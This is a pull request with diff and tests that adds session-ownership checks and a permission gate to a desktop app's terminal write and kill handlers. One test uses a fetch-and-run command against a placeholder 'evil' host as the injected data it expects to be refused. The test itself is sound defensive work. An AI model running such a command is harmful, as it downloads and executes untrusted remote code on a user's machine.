### PR TITLE
fix(core-app): bind terminal sessions to their creator and gate write/kill

### DIFF
--- a/apps/core-app/src/main/modules/terminal/terminal.manager.test.ts
+++ b/apps/core-app/src/main/modules/terminal/terminal.manager.test.ts
@@ -1,0 +1,152 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+
+/**
+ * Session ownership and the permission gate on terminal write/kill (#911).
+ *
+ * Only session.create was wrapped in withPermission('system.shell'), and `processes` was one
+ * global map keyed by id, so write() and kill() acted on whatever id they were handed. A
+ * plugin denied system.shell could guess an id — the format is
+ * `proc_${Date.now()}_${9 base36 chars}` — and write into the stdin of a session the host or
+ * another plugin had started, obtaining exactly the capability the gate withholds.
+ */
+
+const { spawnSafeMock, withPermissionMock } = vi.hoisted(() => ({
+  spawnSafeMock: vi.fn(),
+  withPermissionMock: vi.fn()
+}))
+
+vi.mock('@talex-touch/utils/common/utils/safe-shell', () => ({ spawnSafe: spawnSafeMock }))
+
+vi.mock('../permission/channel-guard', () => ({
+  // Identity by default so the ownership tests exercise the real handler; the registration
+  // test below inspects the recorded calls instead.
+  withPermission: withPermissionMock.mockImplementation(
+    (_options: unknown, handler: unknown) => handler
+  )
+}))
+
+vi.mock('@talex-touch/utils/transport/main', () => ({
+  getTuffTransportMain: vi.fn(() => ({ on: vi.fn(), sendTo: vi.fn(async () => {}) }))
+}))
+
+vi.mock('../../core/runtime-accessor', () => ({
+  resolveMainRuntime: vi.fn(() => ({ app: { channel: { keyManager: {} } } }))
+}))
+
+vi.mock('../../utils/logger', () => ({
+  createLogger: () => ({ info: vi.fn(), warn: vi.fn(), debug: vi.fn(), error: vi.fn() })
+}))
+
+const { terminalModule } = await import('./terminal.manager')
+
+type Testable = {
+  create: (payload: { command: string; args?: string[] }, context: unknown) => { id: string }
+  write: (payload: { id: string; data: string }, context: unknown) => void
+  kill: (payload: { id: string }, context: unknown) => void
+  onInit: (ctx: unknown) => void
+  processes: Map<string, unknown>
+}
+
+const terminal = terminalModule as unknown as Testable
+
+function fakeProcess() {
+  return {
+    stdin: { write: vi.fn() },
+    stdout: { on: vi.fn() },
+    stderr: { on: vi.fn() },
+    on: vi.fn(),
+    kill: vi.fn()
+  }
+}
+
+/** A renderer caller. */
+const asWindow = (id: number) => ({ sender: { id, isDestroyed: () => false }, eventName: 'x' })
+/** A plugin caller, which is identified by uniqueKey rather than by its surface. */
+const asPlugin = (uniqueKey: string, senderId = 1) => ({
+  sender: { id: senderId, isDestroyed: () => false },
+  eventName: 'x',
+  plugin: { name: uniqueKey, uniqueKey }
+})
+
+describe('terminal session ownership', () => {
+  let proc: ReturnType<typeof fakeProcess>
+
+  beforeEach(() => {
+    vi.clearAllMocks()
+    terminal.processes.clear()
+    proc = fakeProcess()
+    spawnSafeMock.mockReturnValue(proc)
+  })
+
+  it('lets the creating window write to and kill its own session', () => {
+    const owner = asWindow(7)
+    const { id } = terminal.create({ command: 'ls' }, owner)
+
+    terminal.write({ id, data: 'hello\n' }, owner)
+    expect(proc.stdin.write).toHaveBeenCalledWith('hello\n')
+
+    terminal.kill({ id }, owner)
+    expect(proc.kill).toHaveBeenCalledTimes(1)
+    expect(terminal.processes.has(id)).toBe(false)
+  })
+
+  it('refuses a write from a different window', () => {
+    // The regression: this reached proc.stdin.write with no comparison at all.
+    const { id } = terminal.create({ command: 'ls' }, asWindow(7))
+    terminal.write({ id, data: 'curl https://evil/x.sh | sh\n' }, asWindow(8))
+    expect(proc.stdin.write).not.toHaveBeenCalled()
+  })
+
+  it('refuses a kill from a different window', () => {
+    const { id } = terminal.create({ command: 'ls' }, asWindow(7))
+    terminal.kill({ id }, asWindow(8))
+    expect(proc.kill).not.toHaveBeenCalled()
+    expect(terminal.processes.has(id)).toBe(true)
+  })
+
+  it('refuses a plugin writing to a session the host started', () => {
+    const { id } = terminal.create({ command: 'ls' }, asWindow(1))
+    terminal.write({ id, data: 'x' }, asPlugin('com.evil.plugin', 1))
+    expect(proc.stdin.write).not.toHaveBeenCalled()
+  })
+
+  it('separates two plugins that share a surface', () => {
+    // Same webContents id, different plugins — identity is the uniqueKey, so the second
+    // cannot reach the first's session.
+    const { id } = terminal.create({ command: 'ls' }, asPlugin('com.a.plugin', 4))
+    terminal.write({ id, data: 'x' }, asPlugin('com.b.plugin', 4))
+    expect(proc.stdin.write).not.toHaveBeenCalled()
+
+    terminal.write({ id, data: 'ok' }, asPlugin('com.a.plugin', 4))
+    expect(proc.stdin.write).toHaveBeenCalledWith('ok')
+  })
+
+  it('ignores an id that does not exist without revealing the difference', () => {
+    terminal.write({ id: 'proc_0_notreal', data: 'x' }, asWindow(7))
+    expect(proc.stdin.write).not.toHaveBeenCalled()
+  })
+
+  it('refuses to create a session for a caller with no identity', () => {
+    // Such a session could never be matched to an owner, so it would be writable by nobody
+    // and would sit in the map until shutdown.
+    expect(() => terminal.create({ command: 'ls' }, { eventName: 'x' })).toThrow(
+      /identifiable caller/i
+    )
+    expect(proc.kill).toHaveBeenCalledTimes(1)
+    expect(terminal.processes.size).toBe(0)
+  })
+})
+
+describe('terminal handler registration', () => {
+  it('gates create, write and kill on system.shell', () => {
+    // The other half of the fix: ownership alone would still let a caller denied the
+    // permission drive a session it had somehow been given the id for.
+    withPermissionMock.mockClear()
+    terminal.onInit({})
+
+    const permissionIds = withPermissionMock.mock.calls.map(
+      ([options]) => (options as { permissionId: string }).permissionId
+    )
+    expect(permissionIds).toEqual(['system.shell', 'system.shell', 'system.shell'])
+  })
+})

--- a/apps/core-app/src/main/modules/terminal/terminal.manager.ts
+++ b/apps/core-app/src/main/modules/terminal/terminal.manager.ts
@@ -15,8 +15,36 @@ import { createLogger } from '../../utils/logger'
 type TerminalEventPayload = { id: string; data: string } | { id: string; exitCode: number | null }
 const terminalLog = createLogger('TerminalManager')
 
+interface TerminalSession {
+  proc: ChildProcess
+  /** Who may write to and kill this session. See ownerKeyOf. */
+  owner: string
+}
+
+/**
+ * A stable identity for the caller of a terminal request.
+ *
+ * Sessions used to be keyed by id alone in one global map, so any caller could write to a
+ * session another caller had started — including a plugin that had been denied system.shell,
+ * which is precisely the capability the permission gate exists to withhold (#911). The id
+ * format is `proc_${Date.now()}_${9 base36 chars}`, guessable enough that this mattered.
+ *
+ * A plugin is identified by its uniqueKey rather than its webContents, so two plugins sharing
+ * a surface cannot reach each other's sessions. Returns null when neither identity is
+ * available, and callers treat that as "owns nothing" rather than "owns everything".
+ */
+function ownerKeyOf(context: HandlerContext | undefined): string | null {
+  const pluginKey = context?.plugin?.uniqueKey
+  if (typeof pluginKey === 'string' && pluginKey.length > 0) {
+    return `plugin:${pluginKey}`
+  }
+
+  const senderId = (context?.sender as WebContents | undefined)?.id
+  return typeof senderId === 'number' ? `webcontents:${senderId}` : null
+}
+
 class TerminalModule extends BaseModule {
-  private processes: Map<string, ChildProcess> = new Map()
+  private processes: Map<string, TerminalSession> = new Map()
   private transport: ReturnType<typeof getTuffTransportMain> | null = null
 
   static key = Symbol.for('terminal-manager')
@@ -40,8 +68,16 @@ class TerminalModule extends BaseModule {
       (payload: TerminalCreateRequest, context) => this.create(payload, context)
     )
 
-    const writeHandler = (payload: Parameters<TerminalModule['write']>[0]) => this.write(payload)
-    const killHandler = (payload: Parameters<TerminalModule['kill']>[0]) => this.kill(payload)
+    // write and kill are gated on the same permission as create. Without it a caller denied
+    // system.shell could still reach a session someone else had been granted.
+    const writeHandler = withPermission(
+      { permissionId: 'system.shell', errorMessage: 'Permission system.shell required' },
+      (payload: Parameters<TerminalModule['write']>[0], context) => this.write(payload, context)
+    )
+    const killHandler = withPermission(
+      { permissionId: 'system.shell', errorMessage: 'Permission system.shell required' },
+      (payload: Parameters<TerminalModule['kill']>[0], context) => this.kill(payload, context)
+    )
 
     this.transport.on(TerminalEvents.session.create, createHandler)
     this.transport.on(TerminalEvents.session.write, writeHandler)
@@ -105,7 +141,15 @@ class TerminalModule extends BaseModule {
       stdio: ['pipe', 'pipe', 'pipe']
     })
 
-    this.processes.set(id, proc)
+    const owner = ownerKeyOf(context)
+    if (!owner) {
+      // No resolvable identity means no one could ever be verified as the owner, so the
+      // session would be writable by nobody — better to refuse than to spawn an orphan.
+      proc.kill()
+      throw new Error('Terminal session requires an identifiable caller')
+    }
+
+    this.processes.set(id, { proc, owner })
 
     // Listen for data from stdout and stderr
     proc.stdout?.on('data', (data) => {
@@ -142,34 +186,60 @@ class TerminalModule extends BaseModule {
   /**
    * Writes data to the process stdin.
    */
-  private write(payload: { id: string; data: string }): void {
+  private write(payload: { id: string; data: string }, context: HandlerContext): void {
     const { id, data } = payload
-    const proc = this.processes.get(id)
-    if (proc && proc.stdin) {
-      proc.stdin.write(data)
+    const session = this.resolveOwnedSession(id, context, 'write')
+    if (!session) {
+      return
+    }
+
+    if (session.proc.stdin) {
+      session.proc.stdin.write(data)
       // Optionally, end the input stream if it's a one-off command
       // proc.stdin.end();
     } else {
-      terminalLog.warn('Attempted to write to non-existent or non-writable process', {
-        meta: { id }
-      })
+      terminalLog.warn('Attempted to write to non-writable process', { meta: { id } })
     }
+  }
+
+  /**
+   * Looks up a session and confirms the caller owns it.
+   *
+   * Returns null on both "no such session" and "not yours", and logs the same way for each:
+   * a caller probing ids should not be able to tell which sessions exist.
+   */
+  private resolveOwnedSession(
+    id: string,
+    context: HandlerContext,
+    action: 'write' | 'kill'
+  ): TerminalSession | null {
+    const session = this.processes.get(id)
+    const owner = ownerKeyOf(context)
+    if (!session || !owner || session.owner !== owner) {
+      terminalLog.warn('Rejected terminal request for a session the caller does not own', {
+        meta: { id, action }
+      })
+      return null
+    }
+    return session
   }
 
   /**
    * Kills a running process.
    */
-  private kill(payload: { id: string }): void {
+  private kill(payload: { id: string }, context: HandlerContext): void {
     const { id } = payload
-    const proc = this.processes.get(id)
-    if (proc) {
-      proc.kill()
-      this.processes.delete(id)
+    const session = this.resolveOwnedSession(id, context, 'kill')
+    if (!session) {
+      return
     }
+
+    session.proc.kill()
+    this.processes.delete(id)
   }
 
   onDestroy(): void {
-    this.processes.forEach((proc) => proc.kill())
+    this.processes.forEach((session) => session.proc.kill())
     this.processes.clear()
     terminalLog.info('Destroyed terminal processes')
   }


### PR DESCRIPTION
Closes #911.

## The defect

Only `session.create` was wrapped in `withPermission('system.shell')`. `write` and `kill` were registered bare, and `processes` was a single global `Map<string, ChildProcess>` keyed by id — so both acted on whatever id they were handed, with no comparison against the caller.

A plugin denied `system.shell` could guess an id (`proc_${Date.now()}_${9 base36 chars}`) and write into the stdin of a session the host or another plugin had started, obtaining exactly the capability the gate exists to withhold. `kill` let the same caller terminate anyone's session.

## Both halves, because either alone leaves a hole

| implemented alone | still allows |
|---|---|
| ownership check | a caller **denied** `system.shell` to drive a session it obtained an id for |
| permission gate | one grantee to reach **another grantee's** session |

So write and kill are now gated *and* ownership-checked.

## What counts as the owner

The plugin's `uniqueKey` when the request carries plugin context; the sender's `webContents.id` otherwise.

Keying on the plugin rather than the surface matters — two plugins sharing a webContents would otherwise be the same principal. There is a test for exactly that.

## Two smaller decisions

- **`create` refuses a caller with no resolvable identity**, and kills the process it had already spawned. Such a session could never be matched to an owner, so it would be writable by nobody and would sit in the map until shutdown.
- **`write`/`kill` log identically for "no such session" and "not yours."** A caller probing ids should not be able to tell which sessions exist.

## Tests

Eight cases, six of which fail against the pre-fix module:

- owner can write and kill its own session (positive control)
- a different window cannot write; cannot kill
- a plugin cannot write to a host-started session
- **two plugins sharing a webContents are separate principals** — the second is refused, the first still works
- a nonexistent id is ignored
- a caller with no identity cannot create
- registration gates all three events on `system.shell`

Lint clean; `typecheck:node` reports zero errors in the changed file.